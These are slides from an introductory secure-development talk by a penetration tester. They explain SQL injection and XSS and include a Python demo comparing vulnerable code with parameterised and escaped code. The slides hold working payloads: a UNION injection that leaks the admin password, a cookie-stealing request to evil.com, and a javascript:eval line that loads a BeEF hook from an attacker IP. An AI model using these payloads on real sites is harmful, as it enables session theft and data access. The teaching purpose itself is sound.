Slides uploaded by liam-osaurus (category: Technology)
Don’t Do what Derpy The Dreadful Dev Does
(also - don’t let “friends” on IRC decide on your talk title)
Secure Development Melbourne, 11/06/2015
whoami
• @liamosaur
• Penetration Tester / Consultant with Assurance
• Previously: C# / Java developer
The Brief
• Basic, introductory-level talk about security
• Establish some common ground between the Infosec and Dev world
OWASP Top 5/10
1. Injection (SQLi, Command injection, XXE, LDAPi etc)
2. Broken Auth / Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
SQLi basics
• Inject user controlled content into dynamic SQL queries, allowing unintended access/control of database
SQLi basics
• PHP: $query = "SELECT username FROM users WHERE username='".$_POST['username']."'";
• Input: liamo
• SQL: SELECT username FROM users WHERE username='liamo'
• Query result: liamo
SQLi basics
• PHP: $query = "SELECT username FROM users WHERE username='".$_POST['username']."'";
• Input: ' OR 'a'='a
• SQL: SELECT username FROM users WHERE username='' OR 'a'='a'
• Query result: list of all users
SQLi basics
• PHP: $query = "SELECT username FROM users WHERE username='".$_POST['username']."'";
• Input: liamo' UNION SELECT password FROM users WHERE username='admin
• SQL: SELECT username FROM users WHERE username='liamo' UNION SELECT password FROM users WHERE username='admin'
• Query result: liamo and the admin password
Cross-Site Scripting (XSS)
• Inject user controlled content into dynamic web content, allowing unintended access/control within a target browser
XSS Basics
• HTML: <html><body>Hello, <?php echo $_REQUEST['name']; ?>!</body></html>
• Input: Liam
• Output: Hello, Liam!
XSS Basics
• HTML: <html><body>Hello, <?php echo $_REQUEST['name']; ?>!</body></html>
• Input: Liam<script>alert(1)</script>
• Output: Hello, Liam! with the injected script executed by the browser (the original slide shows the alert(1) pop-up)
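Added worked example (mine, not code from the talk): the slides' PHP string concatenation rebuilt in Python against an in-memory SQLite table of constructed users, beside a parameterised query, plus the greeting page beside an HTML-escaped version, all run on the exact inputs shown above.

```python
import html
import sqlite3

# Constructed sample data for the demo; not from the talk.
USERS = [("liamo", "hunter2"), ("admin", "s3cret"), ("bob", "pw")]

# Inputs exactly as they appear on the SQLi slides.
INPUTS = [
    "liamo",
    "' OR 'a'='a",
    "liamo' UNION SELECT password FROM users WHERE username='admin",
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, username):
    # Same construction as the PHP on the slides: input is spliced into the SQL text.
    sql = "SELECT username FROM users WHERE username='" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, username):
    # Parameterised: the driver binds the input as a value, so quotes and
    # UNION never reach the SQL parser as syntax.
    sql = "SELECT username FROM users WHERE username=?"
    return [row[0] for row in conn.execute(sql, (username,))]


def greet_vulnerable(name):
    # Same as the PHP echo on the XSS slides: raw input lands in the HTML.
    return "<html><body>Hello, " + name + "!</body></html>"


def greet_safe(name):
    # Output-encode for the HTML text context; <script> becomes inert text.
    return "<html><body>Hello, " + html.escape(name, quote=True) + "!</body></html>"


if __name__ == "__main__":
    db = make_db()
    for inp in INPUTS:
        print(repr(inp), "->", lookup_vulnerable(db, inp), "vs", lookup_safe(db, inp))
    print(greet_vulnerable("Liam<script>alert(1)</script>"))
    print(greet_safe("Liam<script>alert(1)</script>"))
```

The vulnerable lookup returns every user for the second input and leaks the admin password for the third; the parameterised lookup returns nothing for both, because no row is literally named that.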
XSS - Who cares?
• Old school - cookie stealing: "http://evil.com/cookies.php?"+escape(document.cookie)
• Steal session ID - game over
• Less effective thanks to httpOnly cookie flag
Rails
• Problem #1 - I don’t know Rails
• Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
Rails
• Learned Rails. Wrote a basic app
• Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
Rubby XSS
• Challenge for those playing at home: come up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x(){var a = document.createElement('script');a.setAttribute('src','http://192.168.57.159:3000/hook.js');document.head.appendChild(a);};x();");
BeEF Tunnelling Proxy (diagram): the victim is phished with the XSS hook.js; the attacker's browser talks to the BeEF server (HTTP proxy), which relays requests through the victim's browser (XHR proxy) to the target server (same domain as the XSS phish).
Frameworks/Languages
• PHP
  • Good: PHP devs know they need to take security into account
• Ruby on Rails
  • Bad: “The framework takes care of security for me!”